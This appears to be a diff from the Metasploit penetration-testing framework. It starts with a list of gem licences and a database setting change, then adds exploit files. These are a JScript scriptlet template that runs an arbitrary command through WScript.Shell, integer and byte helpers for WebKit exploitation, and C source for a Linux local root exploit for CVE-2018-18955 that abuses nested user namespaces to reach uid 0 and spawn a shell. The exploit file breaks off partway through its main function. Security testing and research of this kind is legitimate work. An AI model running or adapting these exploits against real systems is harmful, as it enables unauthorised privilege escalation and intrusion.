diff-lcs, 1.3, "MIT, Artistic-2.0, GPL-2.0+"
|
||||
dnsruby, 1.60.2, "Apache 2.0"
|
||||
docile, 1.3.0, MIT
|
||||
dnsruby, 1.61.2, "Apache 2.0"
|
||||
docile, 1.3.1, MIT
|
||||
ed25519, 1.2.4, MIT
|
||||
em-http-request, 1.1.5, MIT
|
||||
em-socksify, 0.3.2, MIT
|
||||
erubis, 2.7.0, MIT
|
||||
factory_bot, 4.8.2, MIT
|
||||
factory_bot_rails, 4.8.2, MIT
|
||||
faker, 1.8.7, MIT
|
||||
faraday, 0.14.0, MIT
|
||||
filesize, 0.1.1, MIT
|
||||
fivemat, 1.3.6, MIT
|
||||
google-protobuf, 3.5.1, "New BSD"
|
||||
googleapis-common-protos-types, 1.0.1, "Apache 2.0"
|
||||
googleauth, 0.6.2, "Apache 2.0"
|
||||
grpc, 1.8.3, "Apache 2.0"
|
||||
eventmachine, 1.2.7, "ruby, GPL-2.0"
|
||||
factory_bot, 5.0.0, MIT
|
||||
factory_bot_rails, 5.0.0, MIT
|
||||
faker, 1.9.1, MIT
|
||||
faraday, 0.15.4, MIT
|
||||
filesize, 0.2.0, MIT
|
||||
fivemat, 1.3.7, MIT
|
||||
hashery, 2.1.2, "Simplified BSD"
|
||||
http_parser.rb, 0.6.0, MIT
|
||||
i18n, 0.9.5, MIT
|
||||
jsobfu, 0.4.2, "New BSD"
|
||||
json, 2.1.0, ruby
|
||||
jwt, 2.1.0, MIT
|
||||
little-plugger, 1.1.4, MIT
|
||||
logging, 2.2.2, MIT
|
||||
loofah, 2.2.0, MIT
|
||||
memoist, 0.16.0, MIT
|
||||
loofah, 2.2.3, MIT
|
||||
metasm, 1.0.3, LGPL
|
||||
metasploit-aggregator, 1.0.0, "New BSD"
|
||||
metasploit-concern, 2.0.5, "New BSD"
|
||||
metasploit-credential, 2.0.13, "New BSD"
|
||||
metasploit-framework, 5.0.0, "New BSD"
|
||||
metasploit-credential, 3.0.2, "New BSD"
|
||||
metasploit-framework, 5.0.5, "New BSD"
|
||||
metasploit-model, 2.0.4, "New BSD"
|
||||
metasploit-payloads, 1.3.31, "3-clause (or ""modified"") BSD"
|
||||
metasploit_data_models, 2.0.16, "New BSD"
|
||||
metasploit_payloads-mettle, 0.3.7, "3-clause (or ""modified"") BSD"
|
||||
method_source, 0.9.0, MIT
|
||||
mini_portile2, 2.3.0, MIT
|
||||
metasploit-payloads, 1.3.58, "3-clause (or ""modified"") BSD"
|
||||
metasploit_data_models, 3.0.4, "New BSD"
|
||||
metasploit_payloads-mettle, 0.5.4, "3-clause (or ""modified"") BSD"
|
||||
method_source, 0.9.2, MIT
|
||||
mini_portile2, 2.4.0, MIT
|
||||
minitest, 5.11.3, MIT
|
||||
mqtt, 0.5.0, MIT
|
||||
msgpack, 1.2.4, "Apache 2.0"
|
||||
multi_json, 1.13.1, MIT
|
||||
msgpack, 1.2.6, "Apache 2.0"
|
||||
multipart-post, 2.0.0, MIT
|
||||
nessus_rest, 0.1.6, MIT
|
||||
net-ssh, 4.2.0, MIT
|
||||
net-ssh, 5.1.0, MIT
|
||||
network_interface, 0.0.2, MIT
|
||||
nexpose, 7.2.0, BSD
|
||||
nokogiri, 1.8.2, MIT
|
||||
octokit, 4.8.0, MIT
|
||||
openssl-ccm, 1.2.1, MIT
|
||||
nexpose, 7.2.1, "New BSD"
|
||||
nokogiri, 1.10.1, MIT
|
||||
octokit, 4.13.0, MIT
|
||||
openssl-ccm, 1.2.2, MIT
|
||||
openvas-omp, 0.0.4, MIT
|
||||
os, 0.9.6, MIT
|
||||
packetfu, 1.1.13, BSD
|
||||
patch_finder, 1.0.2, "New BSD"
|
||||
pcaprub, 0.12.4, LGPL-2.1
|
||||
pdf-reader, 2.1.0, MIT
|
||||
pcaprub, 0.13.0, LGPL-2.1
|
||||
pdf-reader, 2.2.0, MIT
|
||||
pg, 0.20.0, "New BSD"
|
||||
pg_array_parser, 0.0.9, unknown
|
||||
postgres_ext, 3.0.0, MIT
|
||||
pry, 0.11.3, MIT
|
||||
public_suffix, 3.0.2, MIT
|
||||
rack, 1.6.9, MIT
|
||||
postgres_ext, 3.0.1, MIT
|
||||
pry, 0.12.2, MIT
|
||||
public_suffix, 3.0.3, MIT
|
||||
rack, 1.6.11, MIT
|
||||
rack-protection, 1.5.5, MIT
|
||||
rack-test, 0.6.3, MIT
|
||||
rails-deprecated_sanitizer, 1.0.3, MIT
|
||||
rails-dom-testing, 1.0.9, MIT
|
||||
rails-html-sanitizer, 1.0.3, MIT
|
||||
railties, 4.2.10, MIT
|
||||
rake, 12.3.0, MIT
|
||||
rails-html-sanitizer, 1.0.4, MIT
|
||||
railties, 4.2.11, MIT
|
||||
rake, 12.3.2, MIT
|
||||
rb-readline, 0.5.5, BSD
|
||||
recog, 2.1.18, unknown
|
||||
recog, 2.1.45, unknown
|
||||
redcarpet, 3.4.0, MIT
|
||||
rex-arch, 0.1.13, "New BSD"
|
||||
rex-bin_tools, 0.1.4, "New BSD"
|
||||
rex-bin_tools, 0.1.6, "New BSD"
|
||||
rex-core, 0.1.13, "New BSD"
|
||||
rex-encoder, 0.1.4, "New BSD"
|
||||
rex-exploitation, 0.1.17, "New BSD"
|
||||
rex-exploitation, 0.1.20, "New BSD"
|
||||
rex-java, 0.1.5, "New BSD"
|
||||
rex-mime, 0.1.5, "New BSD"
|
||||
rex-nop, 0.1.1, "New BSD"
|
||||
rex-ole, 0.1.6, "New BSD"
|
||||
rex-powershell, 0.1.77, "New BSD"
|
||||
rex-powershell, 0.1.79, "New BSD"
|
||||
rex-random_identifier, 0.1.4, "New BSD"
|
||||
rex-registry, 0.1.3, "New BSD"
|
||||
rex-rop_builder, 0.1.3, "New BSD"
|
||||
rex-socket, 0.1.10, "New BSD"
|
||||
rex-socket, 0.1.15, "New BSD"
|
||||
rex-sslscan, 0.1.5, "New BSD"
|
||||
rex-struct2, 0.1.2, "New BSD"
|
||||
rex-text, 0.2.17, "New BSD"
|
||||
rex-text, 0.2.21, "New BSD"
|
||||
rex-zip, 0.1.3, "New BSD"
|
||||
rkelly-remix, 0.0.7, MIT
|
||||
rspec, 3.7.0, MIT
|
||||
rspec-core, 3.7.1, MIT
|
||||
rspec-expectations, 3.7.0, MIT
|
||||
rspec-mocks, 3.7.0, MIT
|
||||
rspec-rails, 3.7.2, MIT
|
||||
rspec, 3.8.0, MIT
|
||||
rspec-core, 3.8.0, MIT
|
||||
rspec-expectations, 3.8.2, MIT
|
||||
rspec-mocks, 3.8.0, MIT
|
||||
rspec-rails, 3.8.2, MIT
|
||||
rspec-rerun, 1.1.0, MIT
|
||||
rspec-support, 3.7.1, MIT
|
||||
ruby-macho, 1.1.0, MIT
|
||||
rspec-support, 3.8.0, MIT
|
||||
ruby-macho, 2.1.0, MIT
|
||||
ruby-rc4, 0.1.5, MIT
|
||||
ruby_smb, 0.0.23, "New BSD"
|
||||
ruby_smb, 1.0.5, "New BSD"
|
||||
rubyntlm, 0.6.2, MIT
|
||||
rubyzip, 1.2.1, "Simplified BSD"
|
||||
rubyzip, 1.2.2, "Simplified BSD"
|
||||
sawyer, 0.8.1, MIT
|
||||
signet, 0.8.1, "Apache 2.0"
|
||||
simplecov, 0.16.0, MIT
|
||||
simplecov, 0.16.1, MIT
|
||||
simplecov-html, 0.10.2, MIT
|
||||
sinatra, 1.4.8, MIT
|
||||
sqlite3, 1.3.13, "New BSD"
|
||||
sshkey, 1.9.0, MIT
|
||||
thor, 0.20.0, MIT
|
||||
swagger-blocks, 2.0.2, MIT
|
||||
thin, 1.7.2, "GPLv2+, Ruby 1.8"
|
||||
thor, 0.20.3, MIT
|
||||
thread_safe, 0.3.6, "Apache 2.0"
|
||||
tilt, 2.0.9, MIT
|
||||
timecop, 0.9.1, MIT
|
||||
ttfunk, 1.5.1, "Nonstandard, GPL-2.0, GPL-3.0"
|
||||
tzinfo, 1.2.5, MIT
|
||||
tzinfo-data, 1.2018.3, MIT
|
||||
tzinfo-data, 1.2018.9, MIT
|
||||
warden, 1.2.7, MIT
|
||||
windows_error, 0.1.2, BSD
|
||||
xdr, 2.0.0, "Apache 2.0"
|
||||
xmlrpc, 0.3.0, ruby
|
||||
yard, 0.9.12, MIT
|
||||
yard, 0.9.18, MIT
|
||||
|
|
|
@ -14,7 +14,7 @@ development: &pgsql
|
|||
adapter: postgresql
|
||||
database: metasploit_framework_development
|
||||
username: postgres
|
||||
pool: 5
|
||||
pool: 25
|
||||
timeout: 5
|
||||
|
||||
# Warning: The database defined as "test" will be erased and
|
||||
|
|
|
@ -1,11 +0,0 @@
|
|||
#!/bin/sh
|
||||
|
||||
gcc -o cpuinfo.ia32.bin cpuinfo.c -static -m32 -Wall && \
|
||||
strip cpuinfo.ia32.bin && \
|
||||
gcc -o cpuinfo.ia64.bin cpuinfo.c -static -m64 -Wall && \
|
||||
strip cpuinfo.ia64.bin && \
|
||||
i586-mingw32msvc-gcc -m32 -static -Wall -o cpuinfo.exe cpuinfo.c && \
|
||||
strip cpuinfo.exe
|
||||
|
||||
ls -la cpuinfo.ia32.bin cpuinfo.ia64.bin cpuinfo.exe
|
||||
|
|
@ -1,64 +0,0 @@
|
|||
// This is a slightly modified copy of the METASM pe-ia32-cpuid.rb example
|
||||
|
||||
/*
|
||||
#!/usr/bin/env ruby
|
||||
# This file is part of Metasm, the Ruby assembly manipulation suite
|
||||
# Copyright (C) 2006-2009 Yoann GUILLOT
|
||||
#
|
||||
# Licence is LGPL, see LICENCE in the top-level directory
|
||||
|
||||
|
||||
#
|
||||
# this sample shows the compilation of a slightly more complex program
|
||||
# it displays in a messagebox the result of CPUID
|
||||
#
|
||||
|
||||
*/
|
||||
|
||||
#include <unistd.h>
|
||||
#include <stdio.h>
|
||||
|
||||
static char *featureinfo[32] = {
|
||||
"fpu", "vme", "de", "pse", "tsc", "msr", "pae", "mce", "cx8",
|
||||
"apic", "unk10", "sep", "mtrr", "pge", "mca", "cmov", "pat",
|
||||
"pse36", "psn", "clfsh", "unk20", "ds", "acpi", "mmx",
|
||||
"fxsr", "sse", "sse2", "ss", "htt", "tm", "unk30", "pbe"
|
||||
}, *extendinfo[32] = {
|
||||
"sse3", "unk1", "unk2", "monitor", "ds-cpl", "unk5-vt", "unk6", "est",
|
||||
"tm2", "unk9", "cnxt-id", "unk12", "cmpxchg16b", "unk14", "unk15",
|
||||
"unk16", "unk17", "unk18", "unk19", "unk20", "unk21", "unk22", "unk23",
|
||||
"unk24", "unk25", "unk26", "unk27", "unk28", "unk29", "unk30", "unk31"
|
||||
};
|
||||
|
||||
#define cpuid(id) __asm__( "cpuid" : "=a"(eax), "=b"(ebx), "=c"(ecx), "=d"(edx) : "a"(id), "b"(0), "c"(0), "d"(0))
|
||||
#define b(val, base, end) ((val << (31-end)) >> (31-end+base))
|
||||
int main(void)
|
||||
{
|
||||
|
||||
unsigned long eax, ebx, ecx, edx;
|
||||
unsigned long i;
|
||||
|
||||
cpuid(0);
|
||||
fprintf(stdout, "VENDOR: %.4s%.4s%.4s\n", (char *)&ebx, (char *)&edx, (char *)&ecx);
|
||||
|
||||
cpuid(1);
|
||||
fprintf(stdout, "MODEL: family=%ld model=%ld stepping=%ld efamily=%ld emodel=%ld ",
|
||||
b(eax, 8, 11), b(eax, 4, 7), b(eax, 0, 3), b(eax, 20, 27), b(eax, 16, 19));
|
||||
fprintf(stdout, "brand=%ld cflush sz=%ld*8 nproc=%ld apicid=%ld\n",
|
||||
b(ebx, 0, 7), b(ebx, 8, 15), b(ebx, 16, 23), b(ebx, 24, 31));
|
||||
|
||||
fprintf(stdout, "FLAGS:");
|
||||
for (i=0 ; i<32 ; i++)
|
||||
if (edx & (1 << i))
|
||||
fprintf(stdout, " %s", featureinfo[i]);
|
||||
|
||||
for (i=0 ; i<32 ; i++)
|
||||
if (ecx & (1 << i))
|
||||
fprintf(stdout, " %s", extendinfo[i]);
|
||||
|
||||
fprintf(stdout, "\n");
|
||||
fflush(stdout);
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
|
@ -0,0 +1,16 @@
|
|||
<?xml version='1.0'?>
|
||||
<package>
|
||||
<component id='giffile'>
|
||||
<registration
|
||||
description='Dummy'
|
||||
progid='giffile'
|
||||
version='1.00'
|
||||
remotable='True'>
|
||||
</registration>
|
||||
<script language='JScript'>
|
||||
<![CDATA[
|
||||
var q = new ActiveXObject('Wscript.Shell').Run("SCRIPTED_COMMAND");
|
||||
]]>
|
||||
</script>
|
||||
</component>
|
||||
</package>
|
|
@ -0,0 +1,182 @@
|
|||
//
|
||||
// Tiny module that provides big (64bit) integers.
|
||||
//
|
||||
// Copyright (c) 2016 Samuel Groß
|
||||
//
|
||||
// Requires utils.js
|
||||
//
|
||||
|
||||
// Datatype to represent 64-bit integers.
|
||||
//
|
||||
// Internally, the integer is stored as a Uint8Array in little endian byte order.
|
||||
function Int64(v) {
|
||||
// The underlying byte array.
|
||||
var bytes = new Uint8Array(8);
|
||||
|
||||
switch (typeof v) {
|
||||
case 'number':
|
||||
v = '0x' + Math.floor(v).toString(16);
|
||||
case 'string':
|
||||
if (v.startsWith('0x'))
|
||||
v = v.substr(2);
|
||||
if (v.length % 2 == 1)
|
||||
v = '0' + v;
|
||||
|
||||
var bigEndian = unhexlify(v, 8);
|
||||
bytes.set(Array.from(bigEndian).reverse());
|
||||
break;
|
||||
case 'object':
|
||||
if (v instanceof Int64) {
|
||||
bytes.set(v.bytes());
|
||||
} else {
|
||||
if (v.length != 8)
|
||||
throw TypeError("Array must have excactly 8 elements.");
|
||||
bytes.set(v);
|
||||
}
|
||||
break;
|
||||
case 'undefined':
|
||||
break;
|
||||
default:
|
||||
throw TypeError("Int64 constructor requires an argument.");
|
||||
}
|
||||
|
||||
// Return a double whith the same underlying bit representation.
|
||||
this.asDouble = function() {
|
||||
// Check for NaN
|
||||
if (bytes[7] == 0xff && (bytes[6] == 0xff || bytes[6] == 0xfe))
|
||||
throw new RangeError("Integer can not be represented by a double");
|
||||
|
||||
return Struct.unpack(Struct.float64, bytes);
|
||||
};
|
||||
|
||||
// Return a javascript value with the same underlying bit representation.
|
||||
// This is only possible for integers in the range [0x0001000000000000, 0xffff000000000000)
|
||||
// due to double conversion constraints.
|
||||
this.asJSValue = function() {
|
||||
if ((bytes[7] == 0 && bytes[6] == 0) || (bytes[7] == 0xff && bytes[6] == 0xff))
|
||||
throw new RangeError("Integer can not be represented by a JSValue");
|
||||
|
||||
// For NaN-boxing, JSC adds 2^48 to a double value's bit pattern.
|
||||
this.assignSub(this, 0x1000000000000);
|
||||
var res = Struct.unpack(Struct.float64, bytes);
|
||||
this.assignAdd(this, 0x1000000000000);
|
||||
|
||||
return res;
|
||||
};
|
||||
|
||||
// Return the underlying bytes of this number as array.
|
||||
this.bytes = function() {
|
||||
return Array.from(bytes);
|
||||
};
|
||||
|
||||
// Return the byte at the given index.
|
||||
this.byteAt = function(i) {
|
||||
return bytes[i];
|
||||
};
|
||||
|
||||
// Return the value of this number as unsigned hex string.
|
||||
this.toString = function() {
|
||||
return '0x' + hexlify(Array.from(bytes).reverse());
|
||||
};
|
||||
|
||||
// Basic arithmetic.
|
||||
// These functions assign the result of the computation to their 'this' object.
|
||||
|
||||
// Decorator for Int64 instance operations. Takes care
|
||||
// of converting arguments to Int64 instances if required.
|
||||
function operation(f, nargs) {
|
||||
return function() {
|
||||
if (arguments.length != nargs)
|
||||
throw Error("Not enough arguments for function " + f.name);
|
||||
for (var i = 0; i < arguments.length; i++)
|
||||
if (!(arguments[i] instanceof Int64))
|
||||
arguments[i] = new Int64(arguments[i]);
|
||||
return f.apply(this, arguments);
|
||||
};
|
||||
}
|
||||
|
||||
// this = -n (two's complement)
|
||||
this.assignNeg = operation(function neg(n) {
|
||||
for (var i = 0; i < 8; i++)
|
||||
bytes[i] = ~n.byteAt(i);
|
||||
|
||||
return this.assignAdd(this, Int64.One);
|
||||
}, 1);
|
||||
|
||||
// this = a + b
|
||||
this.assignAdd = operation(function add(a, b) {
|
||||
var carry = 0;
|
||||
for (var i = 0; i < 8; i++) {
|
||||
var cur = a.byteAt(i) + b.byteAt(i) + carry;
|
||||
carry = cur > 0xff | 0;
|
||||
bytes[i] = cur;
|
||||
}
|
||||
return this;
|
||||
}, 2);
|
||||
|
||||
// this = a - b
|
||||
this.assignSub = operation(function sub(a, b) {
|
||||
var carry = 0;
|
||||
for (var i = 0; i < 8; i++) {
|
||||
var cur = a.byteAt(i) - b.byteAt(i) - carry;
|
||||
carry = cur < 0 | 0;
|
||||
bytes[i] = cur;
|
||||
}
|
||||
return this;
|
||||
}, 2);
|
||||
|
||||
// this = a ^ b
|
||||
this.assignXor = operation(function sub(a, b) {
|
||||
for (var i = 0; i < 8; i++) {
|
||||
bytes[i] = a.byteAt(i) ^ b.byteAt(i);
|
||||
}
|
||||
return this;
|
||||
}, 2);
|
||||
|
||||
// this = a & b
|
||||
this.assignAnd = operation(function sub(a, b) {
|
||||
for (var i = 0; i < 8; i++) {
|
||||
bytes[i] = a.byteAt(i) & b.byteAt(i);
|
||||
}
|
||||
return this;
|
||||
}, 2)
|
||||
}
|
||||
|
||||
// Constructs a new Int64 instance with the same bit representation as the provided double.
|
||||
Int64.fromDouble = function(d) {
|
||||
var bytes = Struct.pack(Struct.float64, d);
|
||||
return new Int64(bytes);
|
||||
};
|
||||
|
||||
// Convenience functions. These allocate a new Int64 to hold the result.
|
||||
|
||||
// Return -n (two's complement)
|
||||
function Neg(n) {
|
||||
return (new Int64()).assignNeg(n);
|
||||
}
|
||||
|
||||
// Return a + b
|
||||
function Add(a, b) {
|
||||
return (new Int64()).assignAdd(a, b);
|
||||
}
|
||||
|
||||
// Return a - b
|
||||
function Sub(a, b) {
|
||||
return (new Int64()).assignSub(a, b);
|
||||
}
|
||||
|
||||
// Return a ^ b
|
||||
function Xor(a, b) {
|
||||
return (new Int64()).assignXor(a, b);
|
||||
}
|
||||
|
||||
// Return a & b
|
||||
function And(a, b) {
|
||||
return (new Int64()).assignAnd(a, b);
|
||||
}
|
||||
|
||||
// Some commonly used numbers.
|
||||
Int64.Zero = new Int64(0);
|
||||
Int64.One = new Int64(1);
|
||||
|
||||
// That's all the arithmetic we need for exploiting WebKit.. :)
|
Binary file not shown.
|
@ -0,0 +1,78 @@
|
|||
//
|
||||
// Utility functions.
|
||||
//
|
||||
// Copyright (c) 2016 Samuel Groß
|
||||
//
|
||||
|
||||
// Return the hexadecimal representation of the given byte.
|
||||
function hex(b) {
|
||||
return ('0' + b.toString(16)).substr(-2);
|
||||
}
|
||||
|
||||
// Return the hexadecimal representation of the given byte array.
|
||||
function hexlify(bytes) {
|
||||
var res = [];
|
||||
for (var i = 0; i < bytes.length; i++)
|
||||
res.push(hex(bytes[i]));
|
||||
|
||||
return res.join('');
|
||||
}
|
||||
|
||||
// Return the binary data represented by the given hexdecimal string.
|
||||
function unhexlify(hexstr) {
|
||||
if (hexstr.length % 2 == 1)
|
||||
throw new TypeError("Invalid hex string");
|
||||
|
||||
var bytes = new Uint8Array(hexstr.length / 2);
|
||||
for (var i = 0; i < hexstr.length; i += 2)
|
||||
bytes[i/2] = parseInt(hexstr.substr(i, 2), 16);
|
||||
|
||||
return bytes;
|
||||
}
|
||||
|
||||
function hexdump(data) {
|
||||
if (typeof data.BYTES_PER_ELEMENT !== 'undefined')
|
||||
data = Array.from(data);
|
||||
|
||||
var lines = [];
|
||||
for (var i = 0; i < data.length; i += 16) {
|
||||
var chunk = data.slice(i, i+16);
|
||||
var parts = chunk.map(hex);
|
||||
if (parts.length > 8)
|
||||
parts.splice(8, 0, ' ');
|
||||
lines.push(parts.join(' '));
|
||||
}
|
||||
|
||||
return lines.join('\n');
|
||||
}
|
||||
|
||||
// Simplified version of the similarly named python module.
|
||||
var Struct = (function() {
|
||||
// Allocate these once to avoid unecessary heap allocations during pack/unpack operations.
|
||||
var buffer = new ArrayBuffer(8);
|
||||
var byteView = new Uint8Array(buffer);
|
||||
var uint32View = new Uint32Array(buffer);
|
||||
var float64View = new Float64Array(buffer);
|
||||
|
||||
return {
|
||||
pack: function(type, value) {
|
||||
var view = type; // See below
|
||||
view[0] = value;
|
||||
return new Uint8Array(buffer, 0, type.BYTES_PER_ELEMENT);
|
||||
},
|
||||
|
||||
unpack: function(type, bytes) {
|
||||
if (bytes.length !== type.BYTES_PER_ELEMENT)
|
||||
throw Error("Invalid bytearray");
|
||||
|
||||
var view = type; // See below
|
||||
byteView.set(bytes);
|
||||
return view[0];
|
||||
},
|
||||
|
||||
// Available types.
|
||||
int8: byteView,
|
||||
int32: uint32View,
|
||||
float64: float64View
|
||||
};
|
||||
})();
|
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
|
@ -0,0 +1,52 @@
|
|||
// subshell.c
|
||||
// author: Jann Horn
|
||||
// source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1712
|
||||
|
||||
#define _GNU_SOURCE
|
||||
#include <unistd.h>
|
||||
#include <grp.h>
|
||||
#include <err.h>
|
||||
#include <stdio.h>
|
||||
#include <fcntl.h>
|
||||
#include <sys/socket.h>
|
||||
#include <sys/un.h>
|
||||
#include <sched.h>
|
||||
#include <sys/wait.h>
|
||||
|
||||
int main() {
|
||||
int sync_pipe[2];
|
||||
char dummy;
|
||||
if (socketpair(AF_UNIX, SOCK_STREAM, 0, sync_pipe)) err(1, "pipe");
|
||||
|
||||
pid_t child = fork();
|
||||
if (child == -1) err(1, "fork");
|
||||
if (child == 0) {
|
||||
close(sync_pipe[1]);
|
||||
if (unshare(CLONE_NEWUSER)) err(1, "unshare userns");
|
||||
if (write(sync_pipe[0], "X", 1) != 1) err(1, "write to sock");
|
||||
|
||||
if (read(sync_pipe[0], &dummy, 1) != 1) err(1, "read from sock");
|
||||
execl("/bin/bash", "bash", NULL);
|
||||
err(1, "exec");
|
||||
}
|
||||
|
||||
close(sync_pipe[0]);
|
||||
if (read(sync_pipe[1], &dummy, 1) != 1) err(1, "read from sock");
|
||||
char pbuf[100];
|
||||
sprintf(pbuf, "/proc/%d", (int)child);
|
||||
if (chdir(pbuf)) err(1, "chdir");
|
||||
const char *id_mapping = "0 0 1\n1 1 1\n2 2 1\n3 3 1\n4 4 1\n5 5 995\n";
|
||||
int uid_map = open("uid_map", O_WRONLY);
|
||||
if (uid_map == -1) err(1, "open uid map");
|
||||
if (write(uid_map, id_mapping, strlen(id_mapping)) != strlen(id_mapping)) err(1, "write uid map");
|
||||
close(uid_map);
|
||||
int gid_map = open("gid_map", O_WRONLY);
|
||||
if (gid_map == -1) err(1, "open gid map");
|
||||
if (write(gid_map, id_mapping, strlen(id_mapping)) != strlen(id_mapping)) err(1, "write gid map");
|
||||
close(gid_map);
|
||||
if (write(sync_pipe[1], "X", 1) != 1) err(1, "write to sock");
|
||||
|
||||
int status;
|
||||
if (wait(&status) != child) err(1, "wait");
|
||||
return 0;
|
||||
}
|
Binary file not shown.
|
@ -0,0 +1,272 @@
|
|||
// subuid_shell.c - Linux local root exploit for CVE-2018-18955
|
||||
// Exploits broken uid/gid mapping in nested user namespaces.
|
||||
// ---
|
||||
// Mostly stolen from Jann Horn's exploit:
|
||||
// - https://bugs.chromium.org/p/project-zero/issues/detail?id=1712
|
||||
// Some code stolen from Xairy's exploits:
|
||||
// - https://github.com/xairy/kernel-exploits
|
||||
// ---
|
||||
// <bcoles@gmail.com>
|
||||
// - added auto subordinate id mapping
|
||||
// https://github.com/bcoles/kernel-exploits/tree/cve-2018-18955
|
||||
|
||||
#define _GNU_SOURCE
|
||||
|
||||
#include <unistd.h>
|
||||
#include <fcntl.h>
|
||||
#include <grp.h>
|
||||
#include <pwd.h>
|
||||
#include <sched.h>
|
||||
#include <stdio.h>
|
||||
#include <sys/socket.h>
|
||||
#include <sys/un.h>
|
||||
#include <sys/wait.h>
|
||||
#include <stdarg.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#include <signal.h>
|
||||
#include <sys/prctl.h>
|
||||
|
||||
#define DEBUG
|
||||
|
||||
#ifdef DEBUG
|
||||
# define dprintf printf
|
||||
#else
|
||||
# define dprintf
|
||||
#endif
|
||||
|
||||
char* SUBSHELL = "./subshell";
|
||||
|
||||
|
||||
// * * * * * * * * * * * * * * * * * File I/O * * * * * * * * * * * * * * * * *
|
||||
|
||||
#define CHUNK_SIZE 1024
|
||||
|
||||
int read_file(const char* file, char* buffer, int max_length) {
|
||||
int f = open(file, O_RDONLY);
|
||||
if (f == -1)
|
||||
return -1;
|
||||
int bytes_read = 0;
|
||||
while (1) {
|
||||
int bytes_to_read = CHUNK_SIZE;
|
||||
if (bytes_to_read > max_length - bytes_read)
|
||||
bytes_to_read = max_length - bytes_read;
|
||||
int rv = read(f, &buffer[bytes_read], bytes_to_read);
|
||||
if (rv == -1)
|
||||
return -1;
|
||||
bytes_read += rv;
|
||||
if (rv == 0)
|
||||
return bytes_read;
|
||||
}
|
||||
}
|
||||
|
||||
static int write_file(const char* file, const char* what, ...) {
|
||||
char buf[1024];
|
||||
va_list args;
|
||||
va_start(args, what);
|
||||
vsnprintf(buf, sizeof(buf), what, args);
|
||||
va_end(args);
|
||||
buf[sizeof(buf) - 1] = 0;
|
||||
int len = strlen(buf);
|
||||
|
||||
int fd = open(file, O_WRONLY | O_CLOEXEC);
|
||||
if (fd == -1)
|
||||
return -1;
|
||||
if (write(fd, buf, len) != len) {
|
||||
close(fd);
|
||||
return -1;
|
||||
}
|
||||
close(fd);
|
||||
return 0;
|
||||
}
|
||||
|
||||
|
||||
// * * * * * * * * * * * * * * * * * Map * * * * * * * * * * * * * * * * *
|
||||
|
||||
int get_subuid(char* output, int max_length) {
|
||||
char buffer[1024];
|
||||
char* path = "/etc/subuid";
|
||||
int length = read_file(path, &buffer[0], sizeof(buffer));
|
||||
if (length == -1)
|
||||
return -1;
|
||||
|
||||
int real_uid = getuid();
|
||||
struct passwd *u = getpwuid(real_uid);
|
||||
|
||||
char needle[1024];
|
||||
sprintf(needle, "%s:", u->pw_name);
|
||||
int needle_length = strlen(needle);
|
||||
char* found = memmem(&buffer[0], length, needle, needle_length);
|
||||
if (found == NULL)
|
||||
return -1;
|
||||
|
||||
int i;
|
||||
for (i = 0; found[needle_length + i] != ':'; i++) {
|
||||
if (i >= max_length)
|
||||
return -1;
|
||||
if ((found - &buffer[0]) + needle_length + i >= length)
|
||||
return -1;
|
||||
output[i] = found[needle_length + i];
|
||||
}
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
int get_subgid(char* output, int max_length) {
|
||||
char buffer[1024];
|
||||
char* path = "/etc/subgid";
|
||||
int length = read_file(path, &buffer[0], sizeof(buffer));
|
||||
if (length == -1)
|
||||
return -1;
|
||||
|
||||
int real_gid = getgid();
|
||||
struct group *g = getgrgid(real_gid);
|
||||
|
||||
char needle[1024];
|
||||
sprintf(needle, "%s:", g->gr_name);
|
||||
int needle_length = strlen(needle);
|
||||
char* found = memmem(&buffer[0], length, needle, needle_length);
|
||||
if (found == NULL)
|
||||
return -1;
|
||||
|
||||
int i;
|
||||
for (i = 0; found[needle_length + i] != ':'; i++) {
|
||||
if (i >= max_length)
|
||||
return -1;
|
||||
if ((found - &buffer[0]) + needle_length + i >= length)
|
||||
return -1;
|
||||
output[i] = found[needle_length + i];
|
||||
}
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
|
||||
// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * *
|
||||
|
||||
int main(int argc, char** argv) {
|
||||
if (argc > 1) SUBSHELL = argv[1];
|
||||
|
||||
dprintf("[.] starting\n");
|
||||
|
||||
dprintf("[.] setting up namespace\n");
|
||||
|
||||
int sync_pipe[2];
|
||||
char dummy;
|
||||
|
||||
if (socketpair(AF_UNIX, SOCK_STREAM, 0, sync_pipe)) {
|
||||
dprintf("[-] pipe\n");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
pid_t child = fork();
|
||||
|
||||
if (child == -1) {
|
||||
dprintf("[-] fork");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
if (child == 0) {
|
||||
prctl(PR_SET_PDEATHSIG, SIGKILL);
|
||||
close(sync_pipe[1]);
|
||||
|
||||
if (unshare(CLONE_NEWUSER) != 0) {
|
||||
dprintf("[-] unshare(CLONE_NEWUSER)\n");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
if (unshare(CLONE_NEWNET) != 0) {
|
||||
dprintf("[-] unshare(CLONE_NEWNET)\n");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
if (write(sync_pipe[0], "X", 1) != 1) {
|
||||
dprintf("write to sock\n");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
if (read(sync_pipe[0], &dummy, 1) != 1) {
|
||||
dprintf("[-] read from sock\n");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
if (setgid(0)) {
|
||||
dprintf("[-] setgid");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
if (setuid(0)) {
|
||||
printf("[-] setuid");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
execl(SUBSHELL, "", NULL);
|
||||
|
||||
dprintf("[-] executing subshell failed\n");
|
||||
}
|
||||
|
||||
close(sync_pipe[0]);
|
||||
|
||||
if (read(sync_pipe[1], &dummy, 1) != 1) {
|
||||
dprintf("[-] read from sock\n");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
char path[256];
|
||||
